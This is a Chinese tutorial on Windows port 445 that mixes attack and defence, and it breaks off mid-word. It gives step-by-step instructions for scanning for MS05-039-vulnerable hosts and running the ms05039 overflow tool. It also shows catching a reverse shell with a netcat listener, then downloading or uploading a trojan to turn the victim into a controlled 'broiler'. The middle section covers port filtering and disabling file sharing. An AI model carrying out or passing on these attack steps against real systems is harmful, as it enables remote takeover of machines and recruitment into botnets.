445端口.docVIP

445端口 教会你445端口的攻击与防范： 445端口是一个毁誉参半的端口，有了它我们可以在局域网 中轻松访问各种共享文件夹或共享打印机，但也正是因为有了它，黑客们才有了可乘之机，他们能通过该端口偷偷共享你的硬盘，甚至会在悄无声息中将你的硬盘格 式化掉！我们所能做的就是想办法不让黑客有机可乘，封堵住445端口漏洞。简单起见，本文中都以Windows 2000为例，对于Windows XP，步骤基本类似。 第一步，我们需要做的是确定一台存在445端口漏洞的主机。可以用扫描工具扫描得到！比如SUPERSCAN这个端口扫描工具。 第二步，假设现在我们已经得到一台存在445端口漏洞的主机，那么我们就可以利用瑞士军刀nc和溢出工具ms05039进行攻击： F:\445ms05039 目标IP 本地IP 1234 。。。 。。。 。。。 。。。 F:\445nc.exe -vv -l -p 1234 。。。 。。。 。。。 。。。 成功的话，就会返回一个shell，然后就可以用我们常用的命令了。比如让他去下载我们的木马或上传一个木马给他，然后运行，这样得到一只肉鸡了。 看了上面的这些，是不是觉得自己的电脑很危险？不用怕，下面我们就来解除这危险的445端口漏洞： 防范445端口漏洞的攻击方法： 1.端口排除法 这种方法利用了Windows 2000系统的端口排除功能将来自于445端口的所有信息包全部禁止掉，让“大 恶人”们无法接近你的主机，下面是这种方法的具体实现步骤： 打开Windows 2000系统的开始菜单，选中“设置”项下面的“网络和拨号连接”图标，并用鼠标右键单击之，从其后的快捷菜单中，单击“浏览”命令； 在接着出现的窗口中，右击“Internet连接”图标，选中“属性”选项，弹出Internet连接属性窗口； 打开“常规”标签页面，将其中的“Internet协议(TCP/IP)”项选中，然后再单击一下“属性”按钮，打开Internet协议(TCP/IP)属性设置页面； 继续单击该页面中的“高级”按钮，打开高级TCP/IP设置窗口，选中其中的“选项”标签，并在该标签页面的“可选的设置”项中，将“TCP/IP筛选”选中，再单击一下对应的“属性”按钮，打开TCP/IP筛选的设置口； 由 于445端口属于一种TCP端口，你可以在对应“TCP端口”的设置项处，将“只允许”项选中，激活下面的“添加”按钮，单击该按钮，在其后打开的“添加 筛选器”窗口中，将必须用到的几个服务端口号码，都添加进来，而将用不到的445端口号码排除在外，设置完毕后，单击“确定”按钮，就可以让设置生效了。 2.服务关闭法 考虑到文件夹或打印机共享服务才会利用到445端口，因此直接将文件夹或打印机共享服务停止掉，同样也能实现关闭445端口的目的，让黑客无法破坏各种共享资源，下面是关闭文件夹或打印机共享服务的具体步骤： 打开Windows 2000系统的开始菜单，选中“设置”项下面的“网络和拨号连接”图标，并用鼠标右键单击之，从其后的快捷菜单中，单击“浏览”命令； 在接着出现的窗口中，右击“Internet连接”图标，选中“属性”选项，弹出Internet连接属性窗口； 打开“常规”标签页面，并在“此连接使用下列选定的组件”列表框中，将“Microsoft网络的文件或打印机共享”选项前面的勾号取消，如图2所示。最后单击“确定”按钮，重新启动系统，Internet上的“大恶人”们就没有权利访问到各种共享资源了。 当然，你也可以在不停止共享服务的条件下，剥夺“大恶人”们的共享访问权利；利用本地安全设置中的“用户权利指派”功能，指定Internet上的任何用户都无权访问本地主机，具体步骤为： 在Windows 2000系统的开始菜单中，依次单击“程序”　“管理工具”　“本地安全设置”选项，接着展开“安全设置”　“本地策略”　“用户权利指派”文件夹，在对应的右边子窗口中选中“拒绝从网络访问这台计算机”选项，并用鼠标左键双击之； 打开设置窗口后，单击“添加”按钮，从弹出的“选择用户或组”对话框中选中“everyone”选项，再单击“添加”按钮，最后单击“确定”，这样任何一位用户都无法从网络访问到本地主机。 首先查找存在MS05-039漏洞的鸡，存在这漏洞的鸡都开了445和139端口， 用扫描器来扫. 下一步利用漏洞工具对远程计算器进行攻击 打开命令提示符，输入ms05039.exe 4466 1 意思是说：是鸡的ip地址，是本地ip地址，4466是成功溢出远程计算鸡数据后将连接到本地计算机的4466端口，1代表远程鸡是中文版的，英文就设置0。当成功的执行了远程数据的溢出操作后就会出现溢出成功的提示如： Tr